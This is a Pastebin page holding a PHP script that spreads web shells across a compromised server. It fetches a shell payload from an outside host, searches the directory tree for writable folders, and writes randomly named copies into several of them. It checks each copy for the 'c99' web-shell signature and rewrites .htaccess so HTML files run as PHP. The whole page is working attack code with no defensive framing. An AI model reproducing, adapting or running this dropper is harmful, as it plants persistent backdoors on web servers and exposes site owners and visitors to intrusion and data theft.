PalmaSolutions

b20bb.php

May 6th, 2018
290
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.05 KB | None | 0 0
  1. <?
  2.  
  3.  
  4.  
  5.     error_reporting(0);
  6.  
  7. set_time_limit(0);
  8.  
  9. $shells=0;
  10.  
  11.     if(isset($_SERVER['WINDIR'])){
  12.    
  13.     $win=1;
  14.     $splitter='\\';
  15.    
  16.    
  17.  
  18.  
  19.  
  20.     echo "[~] OS type: Windows\r\n";
  21.    
  22.  
  23.     }
  24.    
  25.     else{
  26.  
  27.  
  28.     $splitter='/';
  29.    
  30.     echo "[~] OS type: Unix\r\n";
  31.  
  32.     $win=0;
  33.  
  34.     }
  35.  
  36.    
  37.    
  38. flush();
  39.  
  40.  
  41.     if(ini_get("safe_mode")){
  42.  
  43.         echo "[~] Safe Mode is on\r\n";
  44.         // ...
  45.     }
  46.  
  47.         else{
  48.    
  49.  
  50.         echo "[~] Safe Mode is off\n";
  51.         echo "[~] Searching directories ... \r\n";
  52.  
  53.        
  54.  
  55. //      echo $path;
  56. //      $perms = substr(base_convert(fileperms($path), 10, 8), 3);
  57. //      echo $perms;
  58.  
  59.  
  60.         $ourname=$_SERVER['PHP_SELF'];
  61. //      $ourname="/home/local/shit/what/asddsa.php";
  62.  
  63.     $a=split('/',$ourname);
  64.  
  65. //  print_r($a);
  66. //echo sizeof($a);
  67.  
  68.  
  69.     for($i=0;$i<(sizeof($a)-1);$i++){
  70.     $str.=$a[$i].'/';
  71.    
  72.    
  73.         }
  74.  
  75.  
  76.     echo "[~] Current path:     ".$str."\r\n";
  77.     $ourpath=$str;
  78.    
  79.  
  80.  
  81.  
  82. $shell=file_get_contents("http://ftp.tavr.kiev.ua/c.txt");
  83.     if(empty($shell)){ die('cant get shell'); }
  84. echo "[~]ok got shell\r\n";
  85. flush();
  86.  
  87. //       print_r($_SERVER);
  88. //
  89.        
  90. //      echo "$ourname\n";
  91.  
  92.  
  93.  
  94.         $dir="./";
  95.  
  96.  
  97. for($j=1;$j!=$i;$j++){
  98. $dir.='../';
  99.  
  100. }
  101.  
  102. $alldirs=array();
  103.  
  104.  
  105. get_dir($dir);
  106.  
  107. $dirsize=sizeof($alldirs);
  108.  
  109.     if($dirsize>5){
  110.        
  111.         for($i=0;$i!=5;$i++){      
  112.  
  113.  
  114.         $my=$alldirs[rand(0,$dirsize)];
  115.  
  116. //      echo $my."<br>";
  117.         spawn($my);
  118.  
  119.             }
  120.    
  121.  
  122.     }
  123.     else{
  124.  
  125.     foreach($alldirs as $dir){
  126.         spawn($dir);
  127. flush();
  128.  
  129.         }
  130.  
  131.     }
  132.  
  133.  
  134. if($shells>0){
  135. $ht="RemoveHandler .html .htm .php\n
  136. AddType text/html .php .htm .html";
  137.  
  138.  
  139. if($f=fopen(".htaccess","w")){
  140. fputs($f,$ht);
  141. fclose($f);
  142. echo "[+]ok writed htacces!\r\n";
  143. }
  144. }
  145.  
  146.  
  147.        
  148.  
  149.  
  150.                 }
  151.  
  152.  
  153.  
  154.     function get_dir($dir){
  155.  
  156.  
  157.         if (is_dir($dir)) {
  158.  
  159.          if ($dh = opendir($dir)) {
  160.  
  161.             while (($file = readdir($dh)) !== false) {
  162.                
  163.                 if($file!='.' && $file!='..'){
  164.    
  165.                 //echo "filetype: ".filetype($dir.'/'.$file)." || $dir/$file <br>";
  166.                 if(filetype($dir.'/'.$file)=="dir"){
  167.                         if(is_writeable($dir.'/'.$file)){
  168.                             $path="$dir/$file";
  169.                             //echo $path."<br>";
  170.                             array_push($GLOBALS['alldirs'],$path);
  171.                         }  
  172.                 //echo "calling... $dir/$file<br>";
  173.                 get_dir($dir.'/'.$file);
  174.        
  175.         }
  176.  
  177.    
  178.                                 }
  179.                                  }
  180.   closedir($dh);             }
  181. }
  182.  
  183.  
  184.  
  185.  
  186.  
  187. }
  188.  
  189.         function spawn($p){
  190.  
  191.  
  192.  
  193.  
  194.         $p1=str_replace('../','',$p);
  195.         $p1=str_replace('./','',$p1);
  196.  
  197.             $depth=sizeof(split('/',$p1))-1;
  198.             //echo $depth;
  199.  
  200.         $shell=write_shell($p);
  201.        
  202.         $shell='http://'.$_SERVER['HTTP_HOST'].$p1.'/'.$shell;
  203.         //echo $shell."<br>";
  204.  
  205.         if(test_shell($shell)){
  206.             echo "[+]shell ok: $shell\r\n";
  207.                 if(!strstr($shell,$GLOBALS['ourpath'])){
  208.             $GLOBALS['shells']++;
  209.             }
  210.         }
  211.  
  212.     }
  213.  
  214.  
  215. function write_shell($dir){
  216.  
  217.     $shell=$GLOBALS['shell'];
  218.     $name='core'.rand(12513,16392).".php";
  219.     $fullname=$dir.'/'.$name;
  220.  
  221.         if($f=fopen($fullname,"w")){
  222.     //echo 'writing shell: '.$fullname.'<br>';
  223.        
  224.         fputs($f,$shell);
  225.        
  226.         fclose($f);
  227.     return $name;
  228.  
  229. }
  230. return false;
  231. }
  232.  
  233.  
  234. function test_shell($url){
  235.  
  236. $contents=file_get_contents($url);
  237. if(strstr($contents,"c99")){ return true; }
  238.  
  239. }
  240.  
  241. ?>
Advertisement
Add Comment
Please, Sign In to add comment